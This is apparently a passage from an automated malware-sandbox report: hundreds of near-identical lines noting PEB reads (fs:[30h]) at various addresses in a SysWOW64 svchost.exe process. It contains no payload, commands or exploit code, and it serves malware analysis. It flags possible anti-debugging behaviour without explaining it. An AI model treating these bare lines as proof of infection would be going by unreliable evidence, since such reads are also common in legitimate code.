Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03540770 mov eax, dword ptr fs:[00000030h]	2_2_03540770
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03540770 mov eax, dword ptr fs:[00000030h]	2_2_03540770
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03530710 mov eax, dword ptr fs:[00000030h]	2_2_03530710
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03560710 mov eax, dword ptr fs:[00000030h]	2_2_03560710
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0356C700 mov eax, dword ptr fs:[00000030h]	2_2_0356C700
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0356273C mov eax, dword ptr fs:[00000030h]	2_2_0356273C
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0356273C mov ecx, dword ptr fs:[00000030h]	2_2_0356273C
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0356273C mov eax, dword ptr fs:[00000030h]	2_2_0356273C
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_035AC730 mov eax, dword ptr fs:[00000030h]	2_2_035AC730
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0356C720 mov eax, dword ptr fs:[00000030h]	2_2_0356C720
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0356C720 mov eax, dword ptr fs:[00000030h]	2_2_0356C720
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0353C7C0 mov eax, dword ptr fs:[00000030h]	2_2_0353C7C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_035B07C3 mov eax, dword ptr fs:[00000030h]	2_2_035B07C3
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_035347FB mov eax, dword ptr fs:[00000030h]	2_2_035347FB
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_035347FB mov eax, dword ptr fs:[00000030h]	2_2_035347FB
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_035527ED mov eax, dword ptr fs:[00000030h]	2_2_035527ED
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_035527ED mov eax, dword ptr fs:[00000030h]	2_2_035527ED
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_035527ED mov eax, dword ptr fs:[00000030h]	2_2_035527ED
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_035BE7E1 mov eax, dword ptr fs:[00000030h]	2_2_035BE7E1
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_035D678E mov eax, dword ptr fs:[00000030h]	2_2_035D678E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_035307AF mov eax, dword ptr fs:[00000030h]	2_2_035307AF
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_035E47A0 mov eax, dword ptr fs:[00000030h]	2_2_035E47A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0354C640 mov eax, dword ptr fs:[00000030h]	2_2_0354C640
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03562674 mov eax, dword ptr fs:[00000030h]	2_2_03562674
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_035F866E mov eax, dword ptr fs:[00000030h]	2_2_035F866E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_035F866E mov eax, dword ptr fs:[00000030h]	2_2_035F866E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0356A660 mov eax, dword ptr fs:[00000030h]	2_2_0356A660
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0356A660 mov eax, dword ptr fs:[00000030h]	2_2_0356A660
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03572619 mov eax, dword ptr fs:[00000030h]	2_2_03572619
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_035AE609 mov eax, dword ptr fs:[00000030h]	2_2_035AE609
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0354E627 mov eax, dword ptr fs:[00000030h]	2_2_0354E627
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03566620 mov eax, dword ptr fs:[00000030h]	2_2_03566620
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03568620 mov eax, dword ptr fs:[00000030h]	2_2_03568620
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0353262C mov eax, dword ptr fs:[00000030h]	2_2_0353262C
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0356A6C7 mov ebx, dword ptr fs:[00000030h]	2_2_0356A6C7
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0356A6C7 mov eax, dword ptr fs:[00000030h]	2_2_0356A6C7
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_035AE6F2 mov eax, dword ptr fs:[00000030h]	2_2_035AE6F2
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_035AE6F2 mov eax, dword ptr fs:[00000030h]	2_2_035AE6F2
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_035AE6F2 mov eax, dword ptr fs:[00000030h]	2_2_035AE6F2
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_035AE6F2 mov eax, dword ptr fs:[00000030h]	2_2_035AE6F2
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_035B06F1 mov eax, dword ptr fs:[00000030h]	2_2_035B06F1
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_035B06F1 mov eax, dword ptr fs:[00000030h]	2_2_035B06F1
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03534690 mov eax, dword ptr fs:[00000030h]	2_2_03534690
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03534690 mov eax, dword ptr fs:[00000030h]	2_2_03534690
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_035666B0 mov eax, dword ptr fs:[00000030h]	2_2_035666B0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0356C6A6 mov eax, dword ptr fs:[00000030h]	2_2_0356C6A6
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03538550 mov eax, dword ptr fs:[00000030h]	2_2_03538550
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03538550 mov eax, dword ptr fs:[00000030h]	2_2_03538550
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0356656A mov eax, dword ptr fs:[00000030h]	2_2_0356656A
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0356656A mov eax, dword ptr fs:[00000030h]	2_2_0356656A
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0356656A mov eax, dword ptr fs:[00000030h]	2_2_0356656A
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_035C6500 mov eax, dword ptr fs:[00000030h]	2_2_035C6500
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03604500 mov eax, dword ptr fs:[00000030h]	2_2_03604500
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03604500 mov eax, dword ptr fs:[00000030h]	2_2_03604500
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03604500 mov eax, dword ptr fs:[00000030h]	2_2_03604500
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03604500 mov eax, dword ptr fs:[00000030h]	2_2_03604500
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03604500 mov eax, dword ptr fs:[00000030h]	2_2_03604500
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03604500 mov eax, dword ptr fs:[00000030h]	2_2_03604500
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03604500 mov eax, dword ptr fs:[00000030h]	2_2_03604500
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03540535 mov eax, dword ptr fs:[00000030h]	2_2_03540535
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03540535 mov eax, dword ptr fs:[00000030h]	2_2_03540535
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03540535 mov eax, dword ptr fs:[00000030h]	2_2_03540535
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03540535 mov eax, dword ptr fs:[00000030h]	2_2_03540535
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03540535 mov eax, dword ptr fs:[00000030h]	2_2_03540535
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03540535 mov eax, dword ptr fs:[00000030h]	2_2_03540535
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0355E53E mov eax, dword ptr fs:[00000030h]	2_2_0355E53E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0355E53E mov eax, dword ptr fs:[00000030h]	2_2_0355E53E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0355E53E mov eax, dword ptr fs:[00000030h]	2_2_0355E53E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0355E53E mov eax, dword ptr fs:[00000030h]	2_2_0355E53E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0355E53E mov eax, dword ptr fs:[00000030h]	2_2_0355E53E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_035365D0 mov eax, dword ptr fs:[00000030h]	2_2_035365D0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0356A5D0 mov eax, dword ptr fs:[00000030h]	2_2_0356A5D0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0356A5D0 mov eax, dword ptr fs:[00000030h]	2_2_0356A5D0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0356E5CF mov eax, dword ptr fs:[00000030h]	2_2_0356E5CF
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0356E5CF mov eax, dword ptr fs:[00000030h]	2_2_0356E5CF
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0355E5E7 mov eax, dword ptr fs:[00000030h]	2_2_0355E5E7
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0355E5E7 mov eax, dword ptr fs:[00000030h]	2_2_0355E5E7
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0355E5E7 mov eax, dword ptr fs:[00000030h]	2_2_0355E5E7
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0355E5E7 mov eax, dword ptr fs:[00000030h]	2_2_0355E5E7
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0355E5E7 mov eax, dword ptr fs:[00000030h]	2_2_0355E5E7
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0355E5E7 mov eax, dword ptr fs:[00000030h]	2_2_0355E5E7
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0355E5E7 mov eax, dword ptr fs:[00000030h]	2_2_0355E5E7
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0355E5E7 mov eax, dword ptr fs:[00000030h]	2_2_0355E5E7
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_035325E0 mov eax, dword ptr fs:[00000030h]	2_2_035325E0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0356C5ED mov eax, dword ptr fs:[00000030h]	2_2_0356C5ED
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0356C5ED mov eax, dword ptr fs:[00000030h]	2_2_0356C5ED
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0356E59C mov eax, dword ptr fs:[00000030h]	2_2_0356E59C
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03532582 mov eax, dword ptr fs:[00000030h]	2_2_03532582
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03532582 mov ecx, dword ptr fs:[00000030h]	2_2_03532582
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03564588 mov eax, dword ptr fs:[00000030h]	2_2_03564588
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_035545B1 mov eax, dword ptr fs:[00000030h]	2_2_035545B1
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_035545B1 mov eax, dword ptr fs:[00000030h]	2_2_035545B1
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_035B05A7 mov eax, dword ptr fs:[00000030h]	2_2_035B05A7
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_035B05A7 mov eax, dword ptr fs:[00000030h]	2_2_035B05A7
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_035B05A7 mov eax, dword ptr fs:[00000030h]	2_2_035B05A7
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_035EA456 mov eax, dword ptr fs:[00000030h]	2_2_035EA456
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0352645D mov eax, dword ptr fs:[00000030h]	2_2_0352645D
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0355245A mov eax, dword ptr fs:[00000030h]	2_2_0355245A
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0356E443 mov eax, dword ptr fs:[00000030h]	2_2_0356E443
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0356E443 mov eax, dword ptr fs:[00000030h]	2_2_0356E443
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0356E443 mov eax, dword ptr fs:[00000030h]	2_2_0356E443
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0356E443 mov eax, dword ptr fs:[00000030h]	2_2_0356E443
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0356E443 mov eax, dword ptr fs:[00000030h]	2_2_0356E443
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0356E443 mov eax, dword ptr fs:[00000030h]	2_2_0356E443
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0356E443 mov eax, dword ptr fs:[00000030h]	2_2_0356E443
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0356E443 mov eax, dword ptr fs:[00000030h]	2_2_0356E443
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0355A470 mov eax, dword ptr fs:[00000030h]	2_2_0355A470
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0355A470 mov eax, dword ptr fs:[00000030h]	2_2_0355A470
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0355A470 mov eax, dword ptr fs:[00000030h]	2_2_0355A470
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_035BC460 mov ecx, dword ptr fs:[00000030h]	2_2_035BC460
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03568402 mov eax, dword ptr fs:[00000030h]	2_2_03568402
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03568402 mov eax, dword ptr fs:[00000030h]	2_2_03568402
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03568402 mov eax, dword ptr fs:[00000030h]	2_2_03568402
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0356A430 mov eax, dword ptr fs:[00000030h]	2_2_0356A430
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0352E420 mov eax, dword ptr fs:[00000030h]	2_2_0352E420
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0352E420 mov eax, dword ptr fs:[00000030h]	2_2_0352E420
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0352E420 mov eax, dword ptr fs:[00000030h]	2_2_0352E420
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0352C427 mov eax, dword ptr fs:[00000030h]	2_2_0352C427
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_035B6420 mov eax, dword ptr fs:[00000030h]	2_2_035B6420
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_035B6420 mov eax, dword ptr fs:[00000030h]	2_2_035B6420
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_035B6420 mov eax, dword ptr fs:[00000030h]	2_2_035B6420
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_035B6420 mov eax, dword ptr fs:[00000030h]	2_2_035B6420
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_035B6420 mov eax, dword ptr fs:[00000030h]	2_2_035B6420
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_035B6420 mov eax, dword ptr fs:[00000030h]	2_2_035B6420
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_035B6420 mov eax, dword ptr fs:[00000030h]	2_2_035B6420
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_035304E5 mov ecx, dword ptr fs:[00000030h]	2_2_035304E5
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_035EA49A mov eax, dword ptr fs:[00000030h]	2_2_035EA49A
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_035644B0 mov ecx, dword ptr fs:[00000030h]	2_2_035644B0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_035BA4B0 mov eax, dword ptr fs:[00000030h]	2_2_035BA4B0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_035364AB mov eax, dword ptr fs:[00000030h]	2_2_035364AB
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03528B50 mov eax, dword ptr fs:[00000030h]	2_2_03528B50
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_035DEB50 mov eax, dword ptr fs:[00000030h]	2_2_035DEB50
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_035E4B4B mov eax, dword ptr fs:[00000030h]	2_2_035E4B4B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_035E4B4B mov eax, dword ptr fs:[00000030h]	2_2_035E4B4B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_035C6B40 mov eax, dword ptr fs:[00000030h]	2_2_035C6B40
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_035C6B40 mov eax, dword ptr fs:[00000030h]	2_2_035C6B40
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_035FAB40 mov eax, dword ptr fs:[00000030h]	2_2_035FAB40
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_035D8B42 mov eax, dword ptr fs:[00000030h]	2_2_035D8B42
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0352CB7E mov eax, dword ptr fs:[00000030h]	2_2_0352CB7E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03602B57 mov eax, dword ptr fs:[00000030h]	2_2_03602B57
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03602B57 mov eax, dword ptr fs:[00000030h]	2_2_03602B57
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03602B57 mov eax, dword ptr fs:[00000030h]	2_2_03602B57
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03602B57 mov eax, dword ptr fs:[00000030h]	2_2_03602B57
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_035AEB1D mov eax, dword ptr fs:[00000030h]	2_2_035AEB1D
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_035AEB1D mov eax, dword ptr fs:[00000030h]	2_2_035AEB1D
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_035AEB1D mov eax, dword ptr fs:[00000030h]	2_2_035AEB1D
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_035AEB1D mov eax, dword ptr fs:[00000030h]	2_2_035AEB1D
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_035AEB1D mov eax, dword ptr fs:[00000030h]	2_2_035AEB1D
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_035AEB1D mov eax, dword ptr fs:[00000030h]	2_2_035AEB1D
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_035AEB1D mov eax, dword ptr fs:[00000030h]	2_2_035AEB1D
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_035AEB1D mov eax, dword ptr fs:[00000030h]	2_2_035AEB1D
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_035AEB1D mov eax, dword ptr fs:[00000030h]	2_2_035AEB1D
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03604B00 mov eax, dword ptr fs:[00000030h]	2_2_03604B00
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0355EB20 mov eax, dword ptr fs:[00000030h]	2_2_0355EB20
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0355EB20 mov eax, dword ptr fs:[00000030h]	2_2_0355EB20
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_035F8B28 mov eax, dword ptr fs:[00000030h]	2_2_035F8B28
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_035F8B28 mov eax, dword ptr fs:[00000030h]	2_2_035F8B28
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_035DEBD0 mov eax, dword ptr fs:[00000030h]	2_2_035DEBD0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03550BCB mov eax, dword ptr fs:[00000030h]	2_2_03550BCB
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03550BCB mov eax, dword ptr fs:[00000030h]	2_2_03550BCB
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03550BCB mov eax, dword ptr fs:[00000030h]	2_2_03550BCB
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03530BCD mov eax, dword ptr fs:[00000030h]	2_2_03530BCD
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03530BCD mov eax, dword ptr fs:[00000030h]	2_2_03530BCD
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03530BCD mov eax, dword ptr fs:[00000030h]	2_2_03530BCD
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03538BF0 mov eax, dword ptr fs:[00000030h]	2_2_03538BF0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03538BF0 mov eax, dword ptr fs:[00000030h]	2_2_03538BF0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03538BF0 mov eax, dword ptr fs:[00000030h]	2_2_03538BF0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0355EBFC mov eax, dword ptr fs:[00000030h]	2_2_0355EBFC
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_035BCBF0 mov eax, dword ptr fs:[00000030h]	2_2_035BCBF0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03540BBE mov eax, dword ptr fs:[00000030h]	2_2_03540BBE
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03540BBE mov eax, dword ptr fs:[00000030h]	2_2_03540BBE
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_035E4BB0 mov eax, dword ptr fs:[00000030h]	2_2_035E4BB0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_035E4BB0 mov eax, dword ptr fs:[00000030h]	2_2_035E4BB0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03536A50 mov eax, dword ptr fs:[00000030h]	2_2_03536A50
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03536A50 mov eax, dword ptr fs:[00000030h]	2_2_03536A50
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03536A50 mov eax, dword ptr fs:[00000030h]	2_2_03536A50
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03536A50 mov eax, dword ptr fs:[00000030h]	2_2_03536A50
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03536A50 mov eax, dword ptr fs:[00000030h]	2_2_03536A50
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03536A50 mov eax, dword ptr fs:[00000030h]	2_2_03536A50
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03536A50 mov eax, dword ptr fs:[00000030h]	2_2_03536A50
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03540A5B mov eax, dword ptr fs:[00000030h]	2_2_03540A5B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03540A5B mov eax, dword ptr fs:[00000030h]	2_2_03540A5B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_035ACA72 mov eax, dword ptr fs:[00000030h]	2_2_035ACA72
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_035ACA72 mov eax, dword ptr fs:[00000030h]	2_2_035ACA72
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0356CA6F mov eax, dword ptr fs:[00000030h]	2_2_0356CA6F
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0356CA6F mov eax, dword ptr fs:[00000030h]	2_2_0356CA6F
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0356CA6F mov eax, dword ptr fs:[00000030h]	2_2_0356CA6F
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_035DEA60 mov eax, dword ptr fs:[00000030h]	2_2_035DEA60
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_035BCA11 mov eax, dword ptr fs:[00000030h]	2_2_035BCA11
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03554A35 mov eax, dword ptr fs:[00000030h]	2_2_03554A35
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03554A35 mov eax, dword ptr fs:[00000030h]	2_2_03554A35
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0356CA38 mov eax, dword ptr fs:[00000030h]	2_2_0356CA38
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0356CA24 mov eax, dword ptr fs:[00000030h]	2_2_0356CA24
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0355EA2E mov eax, dword ptr fs:[00000030h]	2_2_0355EA2E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03530AD0 mov eax, dword ptr fs:[00000030h]	2_2_03530AD0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03564AD0 mov eax, dword ptr fs:[00000030h]	2_2_03564AD0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03564AD0 mov eax, dword ptr fs:[00000030h]	2_2_03564AD0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03586ACC mov eax, dword ptr fs:[00000030h]	2_2_03586ACC
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03586ACC mov eax, dword ptr fs:[00000030h]	2_2_03586ACC
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03586ACC mov eax, dword ptr fs:[00000030h]	2_2_03586ACC
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0356AAEE mov eax, dword ptr fs:[00000030h]	2_2_0356AAEE
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0356AAEE mov eax, dword ptr fs:[00000030h]	2_2_0356AAEE
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03568A90 mov edx, dword ptr fs:[00000030h]	2_2_03568A90
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0353EA80 mov eax, dword ptr fs:[00000030h]	2_2_0353EA80
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0353EA80 mov eax, dword ptr fs:[00000030h]	2_2_0353EA80
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0353EA80 mov eax, dword ptr fs:[00000030h]	2_2_0353EA80
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0353EA80 mov eax, dword ptr fs:[00000030h]	2_2_0353EA80
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0353EA80 mov eax, dword ptr fs:[00000030h]	2_2_0353EA80
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0353EA80 mov eax, dword ptr fs:[00000030h]	2_2_0353EA80
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0353EA80 mov eax, dword ptr fs:[00000030h]	2_2_0353EA80
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0353EA80 mov eax, dword ptr fs:[00000030h]	2_2_0353EA80
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0353EA80 mov eax, dword ptr fs:[00000030h]	2_2_0353EA80
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03604A80 mov eax, dword ptr fs:[00000030h]	2_2_03604A80
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03538AA0 mov eax, dword ptr fs:[00000030h]	2_2_03538AA0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03538AA0 mov eax, dword ptr fs:[00000030h]	2_2_03538AA0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03586AA4 mov eax, dword ptr fs:[00000030h]	2_2_03586AA4
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_035B0946 mov eax, dword ptr fs:[00000030h]	2_2_035B0946
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03604940 mov eax, dword ptr fs:[00000030h]	2_2_03604940
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_035D4978 mov eax, dword ptr fs:[00000030h]	2_2_035D4978
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_035D4978 mov eax, dword ptr fs:[00000030h]	2_2_035D4978
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_035BC97C mov eax, dword ptr fs:[00000030h]	2_2_035BC97C
